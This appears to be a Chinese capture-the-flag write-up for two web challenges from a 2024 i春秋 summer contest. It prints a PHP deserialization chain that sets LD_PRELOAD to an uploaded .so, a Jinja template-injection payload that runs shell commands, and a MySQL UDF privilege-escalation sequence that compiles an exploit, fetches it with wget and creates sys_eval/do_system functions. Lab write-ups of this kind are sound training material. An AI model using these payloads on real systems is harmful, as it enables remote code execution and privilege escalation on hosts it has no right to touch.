i春秋夏季赛wp

ICHUNQIU CTF

Hijack

这个反序列化比较简单，很明显希望让用LDPRELOAD加载

直接给代码了

<?php
highlight_file(__FILE__);
class ENV{
    public $key;
    public $value;
    public $math;
}
class DIFF{
    public $callback;
    public $back;
    private $flag;
}

class FILE{
    public $filename;
    public $enviroment;
}
class FUN{
    public $fun;
    public $value;
//wakeup -> diff -> FUN get ->call  -> 路径
//wakeup -> diff -> FILE get -> tostring ->改环境变量  LD_PRELOAD=$FLAG
}

//先写so文件，读到转移到的路径
//然后改环境变量LD_PRELOAD=/tmp/5cce5f9d798d93f79681633aba2a8b52.so
// $a=new ENV();
// $a->math=new DIFF();
// $a->math->callback=new FUN();
// $a->math->callback->value="编译后.SO文件用base加密后的str";
// $a->math->callback->fun=new FILE();
// $a->math->callback->fun->filename="hook.so";
// // flag{fake_flag_really_flag_require_you_rce!!!!} 文件成功移动到/tmp/a2767d81ce28fa0998a0012d879f8822.soYou are stupid, what exactly is your identity?YesYesYes 
// // ///tmp/7e65038e1e1894eebdbf134abc4015d1.so
// // //tmp/5cce5f9d798d93f79681633aba2a8b52.so
// echo urlencode(serialize($a));




$a=new ENV();  //WAKEUP -> DIFF ISSET GET-> FILE  TOSTRING->ENV
$b=new ENV();
$b->key="LD_PRELOAD";
$b->value="/tmp/4382cb097e6f5dbc6145ca94978305a4.so";
$a->math=new DIFF();
$a->math->callback=new FILE();
$a->math->callback->enviroment=$b;
///tmp/7e65038e1e1894eebdbf134abc4015d1.so
echo urlencode(serialize($a));
// O%3A3%3A%22ENV%22%3A3%3A%7Bs%3A3%3A%22key%22%3Bs%3A10%3A%22LD_PRELOAD%22%3Bs%3A5%3A%22value%22%3Bs%3A40%3A%22%2Ftmp%2Ff92346398d68a5caa62d91f0cec48d15.so%22%3Bs%3A4%3A%22math%22%3BO%3A4%3A%22DIFF%22%3A3%3A%7Bs%3A8%3A%22callback%22%3BO%3A4%3A%22FILE%22%3A2%3A%7Bs%3A8%3A%22filename%22%3BN%3Bs%3A10%3A%22enviroment%22%3BO%3A3%3A%22ENV%22%3A3%3A%7Bs%3A3%3A%22key%22%3Bs%3A10%3A%22LD_PRELOAD%22%3Bs%3A5%3A%22value%22%3Bs%3A40%3A%22%2Ftmp%2Ff92346398d68a5caa62d91f0cec48d15.so%22%3Bs%3A4%3A%22math%22%3BN%3B%7D%7Ds%3A4%3A%22back%22%3BN%3Bs%3A10%3A%22%00DIFF%00flag%22%3BN%3B%7D%7D

LDPRELOAD的话，每次都要找调用函数调用的东西去构建.so，有没有通杀的.so?

一开始构建的是whoami呢一条，发现没利用，我这边用的是之前虎符ctf的时候一个so文件思路，写的php码去读取的flag

https://fushuling.com/index.php/2022/03/21/%E4%BB%8E%E8%99%8E%E7%AC%A6ctf-ezphp%E6%B5%85%E8%B0%88%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E6%B3%A8%E5%85%A5%E4%B8%8Elinux%E4%B8%B4%E6%97%B6%E6%96%87%E4%BB%B6%E5%88%A9%E7%94%A8/

找不到之前看到的一个通杀so文件的文章了，因为我试用了下编译执行不成功，参考上面这个吧，一般比赛使用的命令不多

https://www.sakura501.top/2022/04/28/hua-shi-gou-zao-e-yi-so-wen-jian/

brother

第一眼看到是name传参，看了下不是sql，试试就是ssti

/?name={{''.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('ps aux').read()}}

有mysql服务，还有python3 java之类的

（secure_file_priv）未开启‑‑skip‑grant‑tables

udf提权

当前mysql ctf用户有权限，

searchsploit mysql udf
searchsploit mysql udf -m 1518
cat 1518.c
gcc -g -c 1518.c -fPIC
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
wget xxx/1518.so

#说是建议编译放到靶机里面再编译 ，防止不同编译环境的问题，所以先wget吧

CREATE TABLE foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
mysql -uctf -p123456 -Dmysql -e "show variables like '%plugin%';";
select * from mysql.func;
select do_system('chmod 777 /flag');

后面还看到一种直接写进去也行

show global variables like '%secure_file_priv%';
show variables like '%plugin%';
select * from func;
select unhex('直接把hex内容写进去') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
create function sys_eval returns string soname 'mysqludf.so';
select sys_eval('whoami');

2024春秋杯网络安全联赛夏季赛WP(web) (qq.com)

2024年 春秋杯 网络安全联赛夏季赛 Web方向 题解WirteUp 部分-CSDN博客